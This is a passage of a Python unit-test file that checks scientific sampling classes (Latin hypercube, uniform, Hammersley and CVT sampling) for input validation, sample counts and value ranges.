def test_prime_number_generator_03(self):
prime_list = SamplingMethods.prime_number_generator(self, 0)
np.testing.assert_array_equal(prime_list, [])
@pytest.mark.unit
def test_prime_number_generator_04(self):
prime_list = SamplingMethods.prime_number_generator(self, -1)
np.testing.assert_array_equal(prime_list, [])
@pytest.mark.unit
def test_prime_number_generator_05(self):
prime_list = SamplingMethods.prime_number_generator(self, 2.9)
np.testing.assert_array_equal(prime_list, [2, 3, 5])
@pytest.mark.unit
def test_base_conversion_01(self):
string_representation = SamplingMethods.base_conversion(self, 5, 2)
assert string_representation == ['1', '0', '1']
@pytest.mark.unit
def test_base_conversion_02(self):
string_representation = SamplingMethods.base_conversion(self, 57, 47)
assert string_representation == ['1', '10']
@pytest.mark.unit
def test_base_conversion_03(self):
string_representation = SamplingMethods.base_conversion(self, 10, -1)
assert string_representation == ['0']
@pytest.mark.unit
def test_base_conversion_04(self):
with pytest.raises(ZeroDivisionError):
string_representation = SamplingMethods.base_conversion(self, 10, 0)
# @pytest.mark.unit
# def test_base_conversion_05(self):
# string_representation = SamplingMethods.base_conversion(self, 10, 1)
@pytest.mark.unit
def test_prime_base_to_decimal_01(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 2)
assert 0.25 == string_representation
@pytest.mark.unit
def test_prime_base_to_decimal_02(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 20)
assert 0.0025 == string_representation
@pytest.mark.unit
def test_prime_base_to_decimal_03(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], 1)
@pytest.mark.unit
def test_prime_base_to_decimal_04(self):
string_representation = SamplingMethods.prime_base_to_decimal(self,['0', '0', '1'], -1)
@pytest.mark.unit
def test_data_sequencing(self):
SamplingClass = SamplingMethods()
sequence_decimal = SamplingClass.data_sequencing(3, 2)
class LatinHypercubeSamplingTestCases(unittest.TestCase):
"""
test__init__selection_01: input numpy array - Test behaviour generate LatinHypercubeSampling object with selection, default number of sample = 5
test__init__selection_02: input Pandas DataFrame - Test behaviour generate LatinHypercubeSampling object with selection, default number of sample
test__init__selection_03: input numpy array - Test behaviour generate LatinHypercubeSampling object with selection, with a selected number of sample
test__init__selection_04: input Pandas DataFrame - Test behaviour generate LatinHypercubeSampling object with selection, with a selected number of sample
test__init__selection_05: input numpy array - Test behaviour raise exception with a selected number of sample = 0
test__init__selection_06: input numpy array - Test behaviour raise exception with a selected number of sample = -1
test__init__selection_07: input numpy array - Test behaviour raise exception with a selected number of sample > input size
test__init__selection_08: input numpy array - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
test__init__selection_09: input list - Test behaviour raise ValueError with list input
test__init__creation_01: input list - Test behaviour generate LatinHypercubeSampling object with default sampling_type, default number of sample = 5
test__init__creation_02: input list - Test behaviour generate LatinHypercubeSampling object with sampling_type = creation, default number of sample = 5
test__init__creation_03: input list - Test behaviour generate LatinHypercubeSampling object with creation with a selected number of sample
test__init__creation_04: input list - Test behaviour raise exception with a selected number of sample = 0
test__init__creation_05: input list - Test behaviour raise exception with a selected number of sample = -1
test__init__creation_06: input list - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
test__init__creation_07: input numpy - Test behaviour raise ValueError with numpy input
test__init__creation_08: input numpy - Test behaviour raise ValueError with pandas input
test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
test_variable_sample_creation: Test behaviour, sampled values are in the range (min, max), number of samples = 5, 10, 1
test_lhs_points_generation: Test behaviour, sampled values are in the range (0, 1) , number of samples = 5, 10, 1, 2 d
test_random_shuffling: Test behaviour, random_shuffling = sampled values after soring, they are in the range (0, 1) , number of samples = 5, 10, 1, 2 d
test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1, 2 d
test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1, 2 d
"""
def setUp(self):
input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
'x2': [10,10,10,10,10,10,10,10,10,10],
'y': [11,14,19,26,35,46,59,74,91,110]})
input_array_list = [[1,10,3],[2,11,4.5]]
self.test_data_numpy = input_array_np
self.test_data_pandas = input_array_pd
self.test_data_list= input_array_list
@pytest.mark.unit
def test__init__selection_01(self):
input_array = self.test_data_numpy
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples, 5)
np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_02(self):
input_array = self.test_data_pandas
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples, 5)
input_array = input_array.to_numpy()
np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_03(self):
input_array = self.test_data_numpy
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=6, sampling_type="selection")
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples,6)
np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_04(self):
input_array = self.test_data_pandas
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=6, sampling_type="selection")
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples,6)
input_array = input_array.to_numpy()
np.testing.assert_array_equal(LHSClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_05(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=0, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_06(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=-1, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_07(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=101, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_08(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=1.1, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_09(self):
input_array = self.test_data_list
with pytest.raises(ValueError):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
@pytest.mark.unit
def test__init__creation_01(self):
input_array = self.test_data_list
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type=None)
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples,5)
@pytest.mark.unit
def test__init__creation_02(self):
input_array = self.test_data_list
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples,5)
@pytest.mark.unit
def test__init__creation_03(self):
input_array = self.test_data_list
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=100, sampling_type='creation')
np.testing.assert_array_equal(LHSClass.data, input_array)
np.testing.assert_array_equal(LHSClass.number_of_samples,100)
@pytest.mark.unit
def test__init__creation_04(self):
input_array = self.test_data_list
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=0, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_05(self):
input_array = self.test_data_list
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=-1, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_06(self):
input_array = self.test_data_list
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=1.1, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_07(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_08(self):
input_array = self.test_data_pandas
with pytest.raises(ValueError):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_selection_01(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type=1)
@pytest.mark.unit
def test__init__creation_selection_02(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='jp')
@pytest.mark.unit
def test_variable_sample_creation(self):
input_array = self.test_data_numpy
for num_samples in [None,10,1]:
LHSClass = LatinHypercubeSampling( input_array, number_of_samples=num_samples, sampling_type="selection")
minimum, maximum = 10, 100
out_var_samples = LHSClass.variable_sample_creation(minimum, maximum)
assert (out_var_samples>=minimum).all() and (out_var_samples<=maximum).all()
np.testing.assert_array_equal(LHSClass.number_of_samples, out_var_samples.shape[0])
@pytest.mark.unit
def test_lhs_points_generation(self):
input_array = self.test_data_numpy
for num_samples in [None,10,1]:
LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
out_sample_points_vector = LHSClass.lhs_points_generation()
assert (out_sample_points_vector>=0).all() and (out_sample_points_vector<=1).all()
np.testing.assert_array_equal(LHSClass.number_of_samples, out_sample_points_vector.shape[0])
np.testing.assert_array_equal(input_array.shape[1] - 1,out_sample_points_vector.shape[1])
@pytest.mark.unit
def test_random_shuffling(self):
input_array = self.test_data_numpy
for num_samples in [None,10,1]:
LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
out_sample_points_vector = LHSClass.lhs_points_generation()
vector_of_points = LHSClass.random_shuffling(out_sample_points_vector)
sidx1 = out_sample_points_vector.argsort(axis=0)
out1 = out_sample_points_vector[sidx1, np.arange(sidx1.shape[1])]
sidx2 = vector_of_points.argsort(axis=0)
out2 = vector_of_points[sidx2, np.arange(sidx2.shape[1])]
assert (out_sample_points_vector>=0).all() and (out_sample_points_vector<=1).all()
np.testing.assert_array_equal(out1, out2)
np.testing.assert_array_equal(LHSClass.number_of_samples, out_sample_points_vector.shape[0])
np.testing.assert_array_equal(input_array.shape[1] - 1,out_sample_points_vector.shape[1])
@pytest.mark.unit
def test_sample_points_01(self):
for num_samples in [None,10,1]:
input_array = self.test_data_numpy
LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
unique_sample_points = LHSClass.sample_points()
expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
np.testing.assert_array_equal(expected_testing,out_testing)
@pytest.mark.unit
def test_sample_points_02(self):
for num_samples in [None,10,1]:
input_array = self.test_data_list
LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="creation")
unique_sample_points = LHSClass.sample_points()
input_array = np.array(input_array)
for i in range(input_array.shape[1]):
var_range = input_array[:,i]
assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class UniformSamplingTestCases(unittest.TestCase):
"""
test__init__selection_01: input numpy array - Test behaviour generate UniformSampling object with selection, default edge, list_of_samples_per_variable = [2,5]
test__init__selection_02: input Pandas DataFrame - Test behaviour generate UniformSampling object with selection, default edge, list_of_samples_per_variable = [2,5]
test__init__selection_03: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is numpy, default edge
test__init__selection_04: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is pandas, default edge
test__init__selection_05: input numpy array - Test behaviour raise ValueError with a list_of_samples_per_variable < number of variables, default edge
test__init__selection_06: input numpy array - Test behaviour raise ValueError with a list_of_samples_per_variable > number of variables, default edge
test__init__selection_07: input numpy array - Test behaviour raise ValueError with a min(list_of_samples_per_variable) < 2, default edge
test__init__selection_08: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is non integer, default edge
test__init__selection_09: input numpy array - Test behaviour raise Exception with a list_of_samples_per_variable = [2,50], 2*50 > number of input data, default edge
test__init__selection_10: input numpy array - Test behaviour generate UniformSampling object with selection, edge = True, list_of_samples_per_variable = [2,5]
test__init__selection_11: input numpy array - Test behaviour generate UniformSampling object with selection, edge = True, list_of_samples_per_variable = [2,5]
test__init__selection_12: input numpy array - Test behaviour raise Exception with edge = 1
test__init__selection_13: input numpy array - Test behaviour raise Exception with edge = 'str'
test__init__creation_01: input list - Test behaviour generate UniformSampling object with default sampling_type, default edge, list_of_samples_per_variable = [2,7,5]
test__init__creation_02: input list - Test behaviour generate UniformSampling object with sampling_type = creation, default edge, list_of_samples_per_variable = [2,7,5]
test__init__creation_03: input list - Test behaviour raise exception with a list_of_samples_per_variable = [1,7,5]
test__init__creation_04: input list - Test behaviour raise exception with a list_of_samples_per_variable = [-1,7,5]
test__init__creation_06: input list - Test behaviour raise exception with a list_of_samples_per_variable = [1.1,7,5] (non-integer)
test__init__creation_07: input numpy - Test behaviour raise ValueError with numpy input
test__init__creation_08: input Pandas - Test behaviour raise ValueError with Pandas input
test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1
test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = [2,5,9],[3,2,10],[4,2,28]
"""
def setUp(self):
input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
'x2': [10,10,10,10,10,10,10,10,10,10],
'y': [11,14,19,26,35,46,59,74,91,110]})
input_array_list = [[1,10,3],[2,11,4.5]]
self.test_data_numpy = input_array_np
self.test_data_pandas = input_array_pd
self.test_data_list= input_array_list
@pytest.mark.unit
def test__init__selection_01(self):
input_array = self.test_data_numpy
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection")
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples, 10)
np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_02(self):
input_array = self.test_data_pandas
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection")
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples, 10)
input_array = input_array.to_numpy()
np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_03(self):
input_array = self.test_data_numpy
with pytest.raises(TypeError):
UniClass = UniformSampling( input_array, np.array([2,5]), sampling_type="selection")
@pytest.mark.unit
def test__init__selection_04(self):
input_array = self.test_data_numpy
with pytest.raises(TypeError):
UniClass = UniformSampling( input_array, pd.DataFrame([2,5]), sampling_type="selection")
@pytest.mark.unit
def test__init__selection_05(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
UniClass = UniformSampling( input_array, [2], sampling_type="selection")
@pytest.mark.unit
def test__init__selection_06(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
UniClass = UniformSampling( input_array, [2,5,5], sampling_type="selection")
@pytest.mark.unit
def test__init__selection_07(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
UniClass = UniformSampling( input_array, [-2,5], sampling_type="selection")
@pytest.mark.unit
def test__init__selection_08(self):
input_array = self.test_data_numpy
with pytest.raises(TypeError):
UniClass = UniformSampling( input_array, [2.1,5], sampling_type="selection")
@pytest.mark.unit
def test__init__selection_09(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [2,50], sampling_type="selection")
@pytest.mark.unit
def test__init__selection_10(self):
input_array = self.test_data_numpy
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=True)
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples, 10)
np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_11(self):
input_array = self.test_data_numpy
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=False)
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples, 10)
np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
@pytest.mark.unit
def test__init__selection_12(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=1)
@pytest.mark.unit
def test__init__selection_13(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges='x')
@pytest.mark.unit
def test__init__creation_01(self):
input_array = self.test_data_list
UniClass = UniformSampling( input_array, [2,7,5], sampling_type=None)
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples,2*7*5)
@pytest.mark.unit
def test__init__creation_02(self):
input_array = self.test_data_list
UniClass = UniformSampling( input_array, [2,7,5], sampling_type="creation")
np.testing.assert_array_equal(UniClass.data, input_array)
np.testing.assert_array_equal(UniClass.number_of_samples,2*7*5)
@pytest.mark.unit
def test__init__creation_03(self):
input_array = self.test_data_list
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [1,7,5], sampling_type="creation")
@pytest.mark.unit
def test__init__creation_04(self):
input_array = self.test_data_list
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [-1,7,5], sampling_type="creation")
@pytest.mark.unit
def test__init__creation_05(self):
input_array = self.test_data_list
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [1.1,7,5], sampling_type="creation")
@pytest.mark.unit
def test__init__creation_06(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
UniClass = UniformSampling( input_array, [2,5], sampling_type="creation")
@pytest.mark.unit
def test__init__creation_07(self):
input_array = self.test_data_pandas
with pytest.raises(ValueError):
UniClass = UniformSampling( input_array, [2,5], sampling_type="creation")
@pytest.mark.unit
def test__init__creation_selection_01(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [2,5], sampling_type=1)
@pytest.mark.unit
def test__init__creation_selection_02(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
UniClass = UniformSampling( input_array, [2,5], sampling_type='jp')
@pytest.mark.unit
def test_sample_points_01(self):
for num_samples in [[2,5],[3,2],[4,2]]:
input_array = self.test_data_numpy
UniClass = UniformSampling(input_array, num_samples, sampling_type="selection")
unique_sample_points = UniClass.sample_points()
expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
np.testing.assert_array_equal(expected_testing,out_testing)
@pytest.mark.unit
def test_sample_points_02(self):
input_array = self.test_data_list
for num_samples in [[2,5,9],[3,2,10],[4,2,28]]:
input_array = self.test_data_list
UniClass = UniformSampling(input_array, num_samples, sampling_type="creation")
unique_sample_points = UniClass.sample_points()
input_array = np.array(input_array)
for i in range(input_array.shape[1]):
var_range = input_array[:,i]
assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class HammersleySamplingTestCases(unittest.TestCase):
"""
__init__ = __init__ in LatinHypercubeSampling except Dimensionality problem:
test__init__selection: Test behaviour with dimensionality > 10
test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1
test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1
"""
def setUp(self):
input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
input_array_np_large = np.array([[0, 10, 11,1,2,3,4,5,6,7,8,9,10], [1, 10, 14,1,2,3,4,5,6,7,8,9,10], [2, 10, 19,1,2,3,4,5,6,7,8,9,10], [3, 10, 26,1,2,3,4,5,6,7,8,9,10], [4, 10, 35,1,2,3,4,5,6,7,8,9,10], [5, 10, 46,1,2,3,4,5,6,7,8,9,10], [6, 10, 59,1,2,3,4,5,6,7,8,9,10], [7, 10, 74,1,2,3,4,5,6,7,8,9,10], [8, 10, 91,1,2,3,4,5,6,7,8,9,10], [9, 10, 110,1,2,3,4,5,6,7,8,9,10]])
input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
'x2': [10,10,10,10,10,10,10,10,10,10],
'y': [11,14,19,26,35,46,59,74,91,110]})
input_array_list = [[1,10,3],[2,11,4.5]]
self.test_data_numpy = input_array_np
self.test_data_numpy_large = input_array_np_large
self.test_data_pandas = input_array_pd
self.test_data_list= input_array_list
@pytest.mark.unit
def test__init__selection(self):
input_array = self.test_data_numpy_large
with pytest.raises(Exception):
HammersleyClass = HammersleySampling( input_array, number_of_samples=None, sampling_type="selection")
@pytest.mark.unit
def test_sample_points_01(self):
for num_samples in [None,10,1]:
input_array = self.test_data_numpy
HammersleyClass = HammersleySampling(input_array, number_of_samples=num_samples, sampling_type="selection")
unique_sample_points = HammersleyClass.sample_points()
expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
np.testing.assert_array_equal(expected_testing,out_testing)
@pytest.mark.unit
def test_sample_points_02(self):
for num_samples in [None,10,1]:
input_array = self.test_data_list
HammersleyClass = HammersleySampling(input_array, number_of_samples=num_samples, sampling_type="creation")
unique_sample_points = HammersleyClass.sample_points()
input_array = np.array(input_array)
for i in range(input_array.shape[1]):
var_range = input_array[:,i]
assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class CVTSamplingTestCases(unittest.TestCase):
"""
test__init__selection_01: input numpy array - Test behaviour generate object with selection, default number of sample = 5, default tolerance
test__init__selection_02: input Pandas DataFrame - Test behaviour generate object with selection, default number of sample, default tolerance
test__init__selection_03: input numpy array - Test behaviour generate object with selection, with a selected number of sample, default tolerance
test__init__selection_04: input Pandas DataFrame - Test behaviour generate object with selection, with a selected number of sample, default tolerance
test__init__selection_05: input numpy array - Test behaviour raise exception with a selected number of sample = 0, default tolerance
test__init__selection_06: input numpy array - Test behaviour raise exception with a selected number of sample = -1, default tolerance
test__init__selection_07: input numpy array - Test behaviour raise exception with a selected number of sample > input size, default tolerance
test__init__selection_08: input numpy array - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer), default tolerance
test__init__selection_09: input list - Test behaviour raise ValueError with list input
test__init__selection_10: input numpy array - Test behaviour raise exception with tolerance > 0.1
test__init__selection_11: input numpy array - Test behaviour raise Warning with tolerance < 0.9
test__init__selection_12: input numpy array - Test behaviour tolerance 0.09
test__init__selection_13: input numpy array - Test behaviour tolerance -0.09
test__init__creation_01: input list - Test behaviour generate object with default sampling_type, default number of sample = 5, default tolerance
test__init__creation_02: input list - Test behaviour generate object with sampling_type = creation, default number of sample = 5, default tolerance
test__init__creation_03: input list - Test behaviour generate object with creation with a selected number of sample, default tolerance
test__init__creation_04: input list - Test behaviour raise exception with a selected number of sample = 0
test__init__creation_05: input list - Test behaviour raise exception with a selected number of sample = -1
test__init__creation_06: input list - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
test__init__creation_07: input numpy - Test behaviour raise ValueError with numpy input
test__init__creation_08: input numpy - Test behaviour raise ValueError with pandas input
test__init__creation_09: input list - Test behaviour raise exception with tolerance > 0.1
test__init__creation_10: input list - Test behaviour raise Warning with tolerance < 0.9
test__init__creation_11: input list - Test behaviour tolerance 0.09
test__init__creation_12: input list - Test behaviour tolerance -0.09
test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
test_random_sample_selection_01 - Test random_sample_selection with size = (5,2)
test_random_sample_selection_02 - Test random_sample_selection with size = (0,2)
test_random_sample_selection_03 - Test random_sample_selection with size = (2,0)
test_random_sample_selection_04 - Test behaviour raise ValueError with size = (5,-1)
test_random_sample_selection_05 - Test behaviour raise TypeError with size =(5,1.1)
Tests: : Unit tests for eucl_distance, a function that evaluates the distance between two points (u, v).
Four demonstration tests are done:
test_eucl_distance_01 - The first test checks that the correct result is obtained when both inputs are single value arrays.
test_eucl_distance_02 - The second test checks that the correct result is returned when both inputs are 2D vectors.
test_eucl_distance_03 - The third test checks that the correct result is returned when both inputs are arrays of the same size.
test_eucl_distance_04 - The fourth test checks that the function is able to calculate the distance from a single point (n x 1 row vector) to a set of design points (supplied in an n x m array)
Unit tests for create_centres, a function that generates new mass centroids for the design space based on McQueen's method.
Four demonstration tests are done:
test_create_centres_01 - The first test checks that the correct result for the new centres is returned when the counter is at its lowest value (1).
test_create_centres_02 - The second test checks that the correct result for the new centres is returned when the counter is at an arbitrary value (10).
test_create_centres_03 - The third test checks that the correct procedure is followed when one of the centres in initial_centres has no close design point to it.
test_create_centres_04 - The fourth test checks that the the approach works as expected for problems with more than two dimensions.
test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1
test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1
"""
def setUp(self):
input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
'x2': [10,10,10,10,10,10,10,10,10,10],
'y': [11,14,19,26,35,46,59,74,91,110]})
input_array_list = [[1,10,3],[2,11,4.5]]
self.test_data_numpy = input_array_np
self.test_data_pandas = input_array_pd
self.test_data_list= input_array_list
@pytest.mark.unit
def test__init__selection_01(self):
input_array = self.test_data_numpy
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=None, sampling_type="selection")
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres, 5)
np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
np.testing.assert_array_equal(CVTClass.eps,1e-7)
@pytest.mark.unit
def test__init__selection_02(self):
input_array = self.test_data_pandas
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None, sampling_type="selection")
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres, 5)
input_array = input_array.to_numpy()
np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
np.testing.assert_array_equal(CVTClass.eps,1e-7)
@pytest.mark.unit
def test__init__selection_03(self):
input_array = self.test_data_numpy
CVTClass = CVTSampling( input_array, number_of_samples=6, tolerance=None,sampling_type="selection")
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres,6)
np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
np.testing.assert_array_equal(CVTClass.eps,1e-7)
@pytest.mark.unit
def test__init__selection_04(self):
input_array = self.test_data_pandas
CVTClass = CVTSampling( input_array, number_of_samples=6,tolerance=None, sampling_type="selection")
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres,6)
input_array = input_array.to_numpy()
np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
np.testing.assert_array_equal(CVTClass.eps,1e-7)
@pytest.mark.unit
def test__init__selection_05(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=0,tolerance=None, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_06(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=-1,tolerance=None, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_07(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=101,tolerance=None, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_08(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=1.1,tolerance=None, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_09(self):
input_array = self.test_data_list
with pytest.raises(ValueError):
CVTClass = CVTSampling( input_array, number_of_samples=None,tolerance=None, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_10(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=0.11, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_11(self):
input_array = self.test_data_numpy
with pytest.warns(Warning):
